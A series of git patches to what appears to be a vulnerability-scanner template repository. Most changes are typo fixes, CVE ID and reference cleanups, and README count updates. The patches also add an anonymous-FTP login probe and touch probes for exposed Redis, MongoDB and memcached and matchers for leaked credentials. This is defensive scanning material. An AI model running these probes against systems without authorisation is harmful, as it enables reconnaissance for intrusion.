b/cves/2020/CVE-2020–26073.yaml @@ -3,7 +3,11 @@ info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 + description: > + A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. + + The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. + reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html tags: Directory Traversal requests: From d3850711008e52dba718fce3cb909c9ce4e53460 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:38:37 +0200 Subject: [PATCH 350/370] =?UTF-8?q?Instead=20of=20-=20used=20=E2=80=93?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020–26073.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index b6c4926400..0b37b522c0 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml @@ -1,11 +1,11 @@ -id: CVE-2020–26073 +id: CVE-2020-26073 info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high description: > A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. - + The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html tags: Directory Traversal From 3d527ae3434b56a28f25b1f04a8851f9a6b28bfa Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Wed, 10 Mar 2021 15:40:01 +0200 Subject: [PATCH 351/370] Use | to not supress newline --- cves/2020/CVE-2020–26073.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml index 0b37b522c0..d40f3127f8 100644 --- a/cves/2020/CVE-2020–26073.yaml +++ b/cves/2020/CVE-2020–26073.yaml @@ -3,7 +3,7 @@ info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - description: > + description: | A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. From d4fd77e9e5da80311a1a60d49bb98774c6597f77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 13:58:06 +0000 Subject: [PATCH 352/370] Auto Update README [Wed Mar 10 13:58:06 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c50e07c15a..a76c05ed92 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**73 directories, 704 files**. +**73 directories, 706 files**. From 06945d56a8c0e69416d6c228417dbd879cfa2381 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 19:33:49 +0530 Subject: [PATCH 353/370] fixing typos --- cves/2020/CVE-2020-10148.yaml | 2 +- cves/2020/CVE-2020-27986.yaml | 2 +- cves/2020/CVE-2020-35476.yaml | 2 +- cves/2021/CVE-2021-21972.yaml | 2 +- cves/2021/CVE-2021-25646.yaml | 4 ++-- exposures/configs/sftp-credentials-exposure.yaml | 2 +- vulnerabilities/jenkins/jenkins-stack-trace.yaml | 2 +- vulnerabilities/wordpress/wp-enabled-registration.yaml | 2 +- 8 files changed, 9 insertions(+), 9 deletions(-) diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml index 2c1438a0e1..bdbae0fbfd 100644 --- a/cves/2020/CVE-2020-10148.yaml +++ b/cves/2020/CVE-2020-10148.yaml @@ -44,6 +44,6 @@ requests: # - "Connection String" # - "text/plain" # part: all -# condtion: and +# condition: and # # Commented matchers can be used for "SWNetPerfMon.db" file. \ No newline at end of file diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index 3accd2bd08..530368bcea 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -25,7 +25,7 @@ requests: - email.smtp_port.secured - email.smtp_username.secured part: body - condtion: and + condition: and - type: status status: - 200 diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 38bce2988e..2311fc42f3 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -26,7 +26,7 @@ requests: - timing - cachehit part: body - condtion: and + condition: and - type: word words: - application/json diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 247b881f6d..9b852d57e9 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -21,7 +21,7 @@ requests: words: - "VSPHERE-UI-JSESSIONID" part: header - condtion: and + condition: and - type: regex regex: - "(Install|Config) Final Progress" diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml index 8178b8dbfd..d1e7e68100 100644 --- a/cves/2021/CVE-2021-25646.yaml +++ b/cves/2021/CVE-2021-25646.yaml @@ -42,10 +42,10 @@ requests: words: - "application/json" part: header - condtion: and + condition: and - type: regex regex: - "numRowsRead" - "numRowsIndexed" part: body - condtion: and + condition: and diff --git a/exposures/configs/sftp-credentials-exposure.yaml b/exposures/configs/sftp-credentials-exposure.yaml index c9881fb540..61516e1122 100644 --- a/exposures/configs/sftp-credentials-exposure.yaml +++ b/exposures/configs/sftp-credentials-exposure.yaml @@ -19,7 +19,7 @@ requests: - "file_permissions" - "extra_list_connections" part: body - condtion: and + condition: and - type: status status: diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 34236c1b5e..c3eec81c72 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -25,7 +25,7 @@ requests: - "java.lang.StringIndexOutOfBoundsException" - "String index out of range" part: body - condtion: and + condition: and - type: status status: - 500 diff --git a/vulnerabilities/wordpress/wp-enabled-registration.yaml b/vulnerabilities/wordpress/wp-enabled-registration.yaml index 88fb8fb184..0ba85a9d7b 100644 --- a/vulnerabilities/wordpress/wp-enabled-registration.yaml +++ b/vulnerabilities/wordpress/wp-enabled-registration.yaml @@ -17,7 +17,7 @@ requests: words: - Register For This Site - E-mail - condtion: and + condition: and part: body - type: status From cdba9196ae9553ea4d0901a42efeffb17178dcb9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 19:35:34 +0530 Subject: [PATCH 354/370] fixing matchers --- cves/2020/CVE-2020-35476.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml index 2311fc42f3..a73f95890b 100644 --- a/cves/2020/CVE-2020-35476.yaml +++ b/cves/2020/CVE-2020-35476.yaml @@ -20,13 +20,15 @@ requests: - type: status status: - 200 - - type: regex - regex: + + - type: word + words: - plotted - timing - cachehit part: body condition: and + - type: word words: - application/json From c65eecd3c993c86c5fb0cd30014263af553d5048 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 14:12:32 +0000 Subject: [PATCH 355/370] Auto Update README [Wed Mar 10 14:12:32 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a76c05ed92..95a46b9173 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**73 directories, 706 files**. +**74 directories, 710 files**. From ed91c0813e34fab94f4d048eb0a0fc2dc8cb9813 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 19:45:41 +0530 Subject: [PATCH 356/370] more typos --- cves/2017/CVE-2017-14537.yaml | 2 +- cves/2017/CVE-2017-16877.yaml | 2 +- cves/2018/CVE-2018-16763.yaml | 2 +- cves/2018/CVE-2018-19386.yaml | 2 +- cves/2019/CVE-2019-12461.yaml | 2 +- cves/2019/CVE-2019-7256.yaml | 2 +- cves/2020/CVE-2020-27986.yaml | 2 +- vulnerabilities/other/apache-flink-unauth-rce.yaml | 2 +- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- vulnerabilities/other/duomicms-sql-injection.yaml | 2 +- vulnerabilities/other/finereport-path-traversal.yaml | 2 +- 11 files changed, 11 insertions(+), 11 deletions(-) diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index c2554af2f4..2cf50e99d5 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -6,7 +6,7 @@ info: severity: medium tags: cve,cve2017,trixbox,traversal -# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537 +# reference:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537 # https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ # Product vendor:-https://sourceforge.net/projects/asteriskathome/ diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index 8e37e84ce3..2b19af42f4 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -4,7 +4,7 @@ info: name: Nextjs v2.4.1 LFI author: pikpikcu severity: high - refrence: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 + reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 tags: cve,cve2017,nextjs,lfi requests: diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index 6c15a7c99b..a268eb5ad9 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -8,7 +8,7 @@ info: # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 -# Refrence: https://www.exploit-db.com/exploits/47138 +# reference: https://www.exploit-db.com/exploits/47138 requests: - raw: diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index bde787e7a0..7e686b8ceb 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml @@ -4,7 +4,7 @@ info: name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting author: pikpikcu severity: medium - refrence: https://www.cvedetails.com/cve/CVE-2018-19386/ + reference: https://www.cvedetails.com/cve/CVE-2018-19386/ tags: cve,cve2018,solarwinds,xss requests: diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index 130c2c984d..3a433fd263 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml @@ -8,7 +8,7 @@ info: # Vendor Homepage: https://webport.se/ # Software Link: https://webport.se/nedladdningar/ -# Refrence: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS +# reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS requests: - method: GET diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index ec68738285..af5736eb0b 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -4,7 +4,7 @@ info: name: eMerge E3 1.00-06 - Remote Code Execution author: pikpikcu severity: critical - refrence: https://www.exploit-db.com/exploits/47619 + reference: https://www.exploit-db.com/exploits/47619 tags: cve,cve2019,emerge,rce # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index 530368bcea..7b82f50f2d 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -8,7 +8,7 @@ info: SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." - refrences: https://nvd.nist.gov/vuln/detail/CVE-2020-27986 + references: https://nvd.nist.gov/vuln/detail/CVE-2020-27986 tags: cve,cve2020,sonarqube requests: diff --git a/vulnerabilities/other/apache-flink-unauth-rce.yaml b/vulnerabilities/other/apache-flink-unauth-rce.yaml index a2d53b0fee..3ff32618bf 100644 --- a/vulnerabilities/other/apache-flink-unauth-rce.yaml +++ b/vulnerabilities/other/apache-flink-unauth-rce.yaml @@ -7,7 +7,7 @@ info: reference: https://github.com/LandGrey/flink-unauth-rce tags: apache,flink,rce - # Refrence: + # reference: # https://www.exploit-db.com/exploits/48978 # https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 1470f0ff6f..5808207bc9 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -6,7 +6,7 @@ info: severity: high tags: bullwark,lfi -# Refrence:-https://www.exploit-db.com/exploits/47773 +# reference:-https://www.exploit-db.com/exploits/47773 # Vendor Homepage: http://www.bullwark.net/ # Version : Bullwark Momentum Series Web Server JAWS/1.0 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml index b05a57fa60..93da2eb742 100644 --- a/vulnerabilities/other/duomicms-sql-injection.yaml +++ b/vulnerabilities/other/duomicms-sql-injection.yaml @@ -4,7 +4,7 @@ info: name: DuomiCMS SQL Injection author: pikpikcu severity: high - refrence: https://redn3ck.github.io/2016/11/01/duomiCMS/ + reference: https://redn3ck.github.io/2016/11/01/duomiCMS/ tags: duomicms,sqli requests: diff --git a/vulnerabilities/other/finereport-path-traversal.yaml b/vulnerabilities/other/finereport-path-traversal.yaml index 9fe319b5e7..95d04cac6a 100644 --- a/vulnerabilities/other/finereport-path-traversal.yaml +++ b/vulnerabilities/other/finereport-path-traversal.yaml @@ -4,7 +4,7 @@ info: name: Finereport 8.0 Path Traversal author: pikpikcu severity: medium - refrence: http://foreversong.cn/archives/1378 + reference: http://foreversong.cn/archives/1378 tags: finereport,lfi requests: From 2049542747f31e1cc7204cbd2d78d820de0fd58f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 10 Mar 2021 20:03:06 +0530 Subject: [PATCH 357/370] Update .nuclei-ignore --- .nuclei-ignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index d39e13bbcc..68eed3c006 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -19,6 +19,6 @@ fuzzing/ # Wordlist directory contains payload to be used with templates. helpers/ miscellaneous/ - +headless/ # Workflows are excluded from default run to avoid duplicate scans. workflows/ \ No newline at end of file From db26ee650e78afb9c0ca7d3221a5590d7d0c247c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Mar 2021 20:26:28 +0000 Subject: [PATCH 358/370] Auto Update README [Wed Mar 10 20:26:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 95a46b9173..915f9c952f 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 61 | technologies | 50 | misconfiguration | 54 | -| workflows | 23 | miscellaneous | 16 | default-logins | 18 | +| workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**74 directories, 710 files**. +**75 directories, 711 files**. From 666149066316a30c48ba9f611e3a54909892ed82 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 12:40:27 +0530 Subject: [PATCH 359/370] Adding unauth-ftp --- network/unauth-ftp.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 network/unauth-ftp.yaml diff --git a/network/unauth-ftp.yaml b/network/unauth-ftp.yaml new file mode 100644 index 0000000000..fc468fcbb9 --- /dev/null +++ b/network/unauth-ftp.yaml @@ -0,0 +1,22 @@ +id: unauth-ftp + +info: + name: FTP Anonymous Login + author: Celesian ( @C3l3si4n ) + severity: medium + reference: https://tools.ietf.org/html/rfc2577 + tags: network,ftp + +network: + - inputs: + - data: "USER anonymous\r\nPASS nuclei\r\n" + + host: + - "{{Hostname}}" + - "{{Hostname}}:21" + + matchers: + - type: word + words: + - "Anonymous access allowed," + part: all \ No newline at end of file From a2798f8a6aaa78b3df497710e38c7f99725b41b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 07:12:19 +0000 Subject: [PATCH 360/370] Auto Update README [Thu Mar 11 07:12:19 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 915f9c952f..37d784efe8 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 711 files**. +**75 directories, 712 files**. From d78a21a84221c396c2d630040d167c1ebfb212cb Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 12:51:36 +0530 Subject: [PATCH 361/370] For network template specified ports are on priority --- network/exposed-redis.yaml | 1 - network/exposed-zookeeper.yaml | 1 - network/memcached-stats.yaml | 1 - network/mongodb-detect.yaml | 1 - network/mongodb-unauth.yaml | 1 - network/unauth-ftp.yaml | 1 - 6 files changed, 6 deletions(-) diff --git a/network/exposed-redis.yaml b/network/exposed-redis.yaml index ee683481cd..b3a6723804 100644 --- a/network/exposed-redis.yaml +++ b/network/exposed-redis.yaml @@ -12,7 +12,6 @@ network: - data: "info\r\nquit\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:6379" read-size: 2048 diff --git a/network/exposed-zookeeper.yaml b/network/exposed-zookeeper.yaml index 027a490123..33efe6f865 100644 --- a/network/exposed-zookeeper.yaml +++ b/network/exposed-zookeeper.yaml @@ -12,7 +12,6 @@ network: - data: "envi\r\nquit\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:2181" read-size: 2048 diff --git a/network/memcached-stats.yaml b/network/memcached-stats.yaml index 62f8e25bae..5252fd2b3f 100644 --- a/network/memcached-stats.yaml +++ b/network/memcached-stats.yaml @@ -11,7 +11,6 @@ network: - data: "stats\r\n\r\nquit\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:11211" read-size: 2048 diff --git a/network/mongodb-detect.yaml b/network/mongodb-detect.yaml index 55716383b9..7ba70d3c82 100644 --- a/network/mongodb-detect.yaml +++ b/network/mongodb-detect.yaml @@ -13,7 +13,6 @@ network: type: hex host: - - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 diff --git a/network/mongodb-unauth.yaml b/network/mongodb-unauth.yaml index 6d8c522a1d..eccd19ea30 100644 --- a/network/mongodb-unauth.yaml +++ b/network/mongodb-unauth.yaml @@ -13,7 +13,6 @@ network: type: hex host: - - "{{Hostname}}" - "{{Hostname}}:27017" read-size: 2048 matchers: diff --git a/network/unauth-ftp.yaml b/network/unauth-ftp.yaml index fc468fcbb9..090f597c79 100644 --- a/network/unauth-ftp.yaml +++ b/network/unauth-ftp.yaml @@ -12,7 +12,6 @@ network: - data: "USER anonymous\r\nPASS nuclei\r\n" host: - - "{{Hostname}}" - "{{Hostname}}:21" matchers: From c04353a0c92f8069926ec4185bd152b1ddf0f2a0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 12:26:36 +0200 Subject: [PATCH 362/370] Add references --- cves/2020/CVE-2020-26214.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index 4d3b60ac22..2f43c8cf64 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -5,12 +5,12 @@ info: author: CasperGN severity: critical description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests. - reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh + reference: + - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh + - https://tools.ietf.org/html/rfc4513#section-5.1.2 + - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta - # Reference: https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - # Reference: https://tools.ietf.org/html/rfc4513#section-5.1.2 - requests: - method: GET path: From 7e0ec83db227d552c6b1d91c464aac8c4d5f87c0 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 12:37:37 +0200 Subject: [PATCH 363/370] =?UTF-8?q?=E2=80=93=20=3D>=20-?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-26073.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-26073.yaml b/cves/2020/CVE-2020-26073.yaml index e089d618b5..517b9a4891 100644 --- a/cves/2020/CVE-2020-26073.yaml +++ b/cves/2020/CVE-2020-26073.yaml @@ -1,9 +1,9 @@ -id: CVE-2020–26073 +id: CVE-2020-26073 info: name: Cisco SD-WAN vManage Software Directory Traversal author: madrobot severity: high - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073 + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073 tags: cve,cve2020,cisco,lfi requests: From 0d56e864276f0e0b2afd41153ab598c9999a052e Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Thu, 11 Mar 2021 12:56:53 +0200 Subject: [PATCH 364/370] =?UTF-8?q?Replace=20=E2=80=93=20with=20-=20and=20?= =?UTF-8?q?give=20better=20references?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-25213.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 9cc0ee8f57..fbd3425453 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -1,11 +1,13 @@ -id: CVE-2020–25213 +id: CVE-2020-25213 info: name: WP File Manager RCE author: foulenzer severity: critical description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213 + reference: + - https://plugins.trac.wordpress.org/changeset/2373068 + - https://github.com/w4fz5uck5/wp-file-manager-0day tags: cve,cve2020,wordpress,rce # Uploaded file will be accessible at:- From 0b1e21dddb83ca2729d67f77f39e8d41e4bf0e1c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 18:14:19 +0530 Subject: [PATCH 365/370] syntax update --- fuzzing/iis-shortname.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 1a2db42b20..3c3c4a7e28 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -46,8 +46,8 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 + req-condition: true matchers: - type: dsl - name: iis-scan dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" From 2d2d253515090dc3969f166ee35d55160e5a3e8b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 18:32:26 +0530 Subject: [PATCH 366/370] removing empty spaces --- cves/2020/CVE-2020-25213.yaml | 2 +- cves/2020/CVE-2020-26214.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index fbd3425453..987eee7315 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -5,7 +5,7 @@ info: author: foulenzer severity: critical description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. - reference: + reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day tags: cve,cve2020,wordpress,rce diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index 2f43c8cf64..215918bce0 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -5,7 +5,7 @@ info: author: CasperGN severity: critical description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests. - reference: + reference: - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ From 01e25a5d1e1aa8070ae52e2be19cd7642ed24bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 13:47:27 +0000 Subject: [PATCH 367/370] Auto Update README [Thu Mar 11 13:47:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37d784efe8..b4ba60dc51 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 61 | technologies | 50 | misconfiguration | 54 | +| exposures | 62 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 712 files**. +**75 directories, 713 files**. From d3ee173adeeff3ab3cd6d5f483f01bd88ced3999 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 19:47:22 +0530 Subject: [PATCH 368/370] Adding updated syntax --- cves/2019/CVE-2019-11869.yaml | 1 + exposed-panels/identityguard-selfservice-entrust.yaml | 1 + misconfiguration/put-method-enabled.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 27c0bf4a94..8a92db1344 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -33,6 +33,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Upgrade-Insecure-Requests: 1 + req-condition: true matchers-condition: and matchers: - type: dsl diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml index 771b21408a..a8cfb6d388 100644 --- a/exposed-panels/identityguard-selfservice-entrust.yaml +++ b/exposed-panels/identityguard-selfservice-entrust.yaml @@ -11,6 +11,7 @@ requests: - "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" + req-condition: true redirects: true max-redirects: 2 matchers: diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 33f999e808..1e10bad487 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -19,6 +19,7 @@ requests: GET 